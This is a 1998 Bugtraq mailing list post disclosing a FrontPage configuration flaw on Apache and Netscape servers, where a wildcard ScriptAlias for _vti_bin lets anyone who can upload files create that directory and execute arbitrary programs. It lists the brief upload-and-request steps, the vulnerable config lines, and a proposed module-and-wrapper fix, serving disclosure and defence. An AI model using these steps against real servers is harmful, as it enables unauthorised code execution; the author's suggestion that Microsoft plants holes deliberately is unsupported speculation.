Bugtraq mailing list archives
Another Frontpage Bug, with promiscuous ScriptAliases
From: pedward () WEBCOM COM (pedward () WEBCOM COM)
Date: Thu, 23 Apr 1998 18:35:34 -0700
The Apache hack that M$ distributes allows one to create ANY directory on a Frontpage enabled web server, and execute content in it. This also goes for the stock Netscape Server config that M$ recommends. Hmm, I wonder if M$ deliberately places security holes in Unix apps so that they can claim "but Frontpage under IIS doesn't have that hole!". Mainly because IIS loads Frontpage as a DLL (I suppose). Frontpage wouldn't be anywhere near the PIG it is if it ran as an Apache module or NSAPI module...but then who has an extra 5 megs per server process to burn??? EG: You want a rogue program to run, and the victim has anonymous uploadable FTP (or you sign up for a service and you want to run binaries on the server, but can't): mkdir _vti_bin cd _vti_bin put [whatever bin] Web browser: http://www.victim.com/somedirectorystructure/_vti_bin/trojanfile Boom you've got stuff runnin on that server. They configure the Netscape server the same way. Unless you make a special NSAPI or Apache module, you're vulnerable as a freshly born ewe of a cloned sheep named Dolly! And why is this possible??? ScriptAlias "*/_vti_bin/*" /somedirpath <Object ppath="*/_vti_bin/*"> ... </Object> Solution: Custom NSAPI / Apache module: NameTrans fn="prefix_fpdir" prefix_path="/somedir/cgi-bin/frontpage" name="cgi" Plus: Custom Stub: /somedir/cgi-bin/frontpage/cgi-wrapper [path to real binary] --Perry -- Perry Harrington System Software Engineer zelur xuniL () http://www.webcom.com perry.harrington () webcom com Think Blue. /\
Current thread:
- More Microsoft debri Lloyd Vancil (Apr 23)
- <Possible follow-ups>
- Re: More Microsoft debri Michael Howard (Apr 23)
- Re: More Microsoft debri pedward () WEBCOM COM (Apr 23)
- Re: More Microsoft debri James E. Robinson, III (Apr 23)
- Another Frontpage Bug, with promiscuous ScriptAliases pedward () WEBCOM COM (Apr 23)
- Flaw in HTTP-Authentication in O'Reilly Website Pro BarKode (Apr 23)
- Re: Another Frontpage Bug, with promiscuous ScriptAliases Marc Slemko (Apr 23)
- How to exploit AlephOne by JP of AntiOnline F0RMiCA (Apr 24)
- Security Hole in Netscape Enterprise Server 3.0 Daragh Malone (Apr 24)
- Re: Security Hole in Netscape Enterprise Server 3.0 Matthew Frederick (Apr 24)
- How to exploit mudge by AlephOne by JP AntiOnline Dr. Mudge (Apr 24)
- Re: How to exploit mudge by AlephOne by JP AntiOnline Aleph One (Apr 24)
- Re: More Microsoft debri pedward () WEBCOM COM (Apr 23)